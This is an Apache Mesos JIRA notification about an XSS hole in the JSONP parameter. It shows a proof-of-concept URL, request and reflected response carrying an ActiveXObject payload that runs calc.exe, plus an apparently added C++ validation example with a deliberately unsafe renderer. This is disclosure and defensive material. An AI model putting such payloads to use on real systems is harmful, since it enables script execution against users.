Posted to issues@mesos.apache.org by "Gilbert Song (JIRA)" <ji...@apache.org> on 2018/01/19 22:17:13 UTC

[jira] [Updated] (MESOS-7826) XSS in JSONP parameter

     [ https://issues.apache.org/jira/browse/MESOS-7826?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]

Gilbert Song updated MESOS-7826:
--------------------------------
    Issue Type: Improvement  (was: Bug)

> XSS in JSONP parameter
> ----------------------
>
>                 Key: MESOS-7826
>                 URL: https://issues.apache.org/jira/browse/MESOS-7826
>             Project: Mesos
>          Issue Type: Improvement
>          Components: json api
>         Environment: Running as part of DC/OS in a docker container.
>            Reporter: Vincent Ruijter
>            Priority: Critical
>
> It is possible to inject arbitrary content into a server request. Take into account the following URL: https://xxx.xxx.com/mesos/master/state?jsonp=var+oShell+%3d+new+ActiveXObject("WScript.Shell")%3boShell.Run("calc.exe",+1)%3b
> This will result in the following request:
> {code:html}
> GET /mesos/master/state?jsonp=var+oShell+%3d+new+ActiveXObject("WScript.Shell")%3boShell.Run("calc.exe",+1)%3b HTTP/1.1
> Host: xxx.xxx.com
> User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:54.0) Gecko/20100101 Firefox/54.0
> Accept: */*
> Accept-Language: en-US,en;q=0.5
> [...SNIP...]
> {code}
> The server response:
> {code:html}
> HTTP/1.1 200 OK
> Server: openresty/1.9.15.1
> Date: Tue, 25 Jul 2017 09:04:31 GMT
> Content-Type: text/javascript
> Content-Length: 1411637
> Connection: close
> var oShell = new ActiveXObject("WScript.Shell");oShell.Run("calc.exe", 1);({"version":"1.2.1","git_sha":"f219b2e4f6265c0b6c4d826a390b67fe9d5e1097","build_date":"2017-06-01 19:16:40","build_time":149634
> [...SNIP...]
> {code}
> On Internet Explorer this will trigger a file download, and when executing the file (state.js), it will pop up a calculator. It's my recommendation to apply input validation on this parameter, to prevent abuse.
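The quoted response shows the `jsonp` parameter being concatenated verbatim in front of the JSON document, which is why any JavaScript statement placed in it is served back as script. The following is an added example of the input validation the reporter recommends, written in C++ because Mesos is; it is not Mesos code, and `isValidJsonpCallback`, `renderJsonp`, `renderJsonpUnchecked` and the sample payloads are constructed for illustration.

```cpp
// Added example, not Mesos's own code: validating a JSONP callback before it
// is reflected into a text/javascript response. Function names and sample
// values are constructed for illustration.
#include <cctype>
#include <iostream>
#include <string>

// Accept only a dotted chain of JavaScript identifiers, e.g. "cb" or
// "app.handlers.onState". Parentheses, operators, quotes, whitespace and
// semicolons cannot pass, so the reflected value can only name a function.
bool isValidJsonpCallback(const std::string& callback) {
    if (callback.empty() || callback.size() > 128) {
        return false;
    }
    bool startOfSegment = true;  // true at the beginning and right after '.'
    for (unsigned char c : callback) {
        if (c == '.') {
            if (startOfSegment) {
                return false;    // empty segment: ".a" or "a..b"
            }
            startOfSegment = true;
            continue;
        }
        const bool identStart = std::isalpha(c) || c == '_' || c == '$';
        const bool identPart = identStart || std::isdigit(c);
        if (startOfSegment ? !identStart : !identPart) {
            return false;
        }
        startOfSegment = false;
    }
    return !startOfSegment;      // a trailing '.' leaves the last segment empty
}

struct JsonpResult {
    bool ok;           // false => the handler should answer 400 Bad Request
    std::string body;  // response body when ok
};

// The behaviour the report shows: the parameter is concatenated verbatim in
// front of the JSON document, so whatever the client sends becomes code.
std::string renderJsonpUnchecked(const std::string& callback, const std::string& json) {
    return callback + "(" + json + ")";
}

// Hardened version: reject anything that is not a plain callback name. The
// leading "/**/" comment is a common hardening so that the response body
// never begins with client-chosen bytes.
JsonpResult renderJsonp(const std::string& callback, const std::string& json) {
    if (!isValidJsonpCallback(callback)) {
        return {false, ""};
    }
    return {true, "/**/" + callback + "(" + json + ");"};
}

int main() {
    const std::string json = "{\"version\":\"1.2.1\"}";  // constructed sample payload
    const std::string benign = "onState";
    const std::string hostile = "alert(1);onState";      // constructed, not from the report

    std::cout << "unchecked: " << renderJsonpUnchecked(hostile, json) << "\n";
    JsonpResult r = renderJsonp(hostile, json);
    std::cout << "checked:   " << (r.ok ? r.body : std::string("400 Bad Request")) << "\n";
    std::cout << "benign:    " << renderJsonp(benign, json).body << "\n";
    return 0;
}
```

Rejecting the request outright is preferable to stripping characters, since a sanitizer that tries to keep "most" of the value tends to leave edge cases behind. Independently of the validation, serving the body with an exact `Content-Type` and `X-Content-Type-Options: nosniff` limits how a browser can reinterpret it.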



--
This message was sent by Atlassian JIRA
(v7.6.3#76005)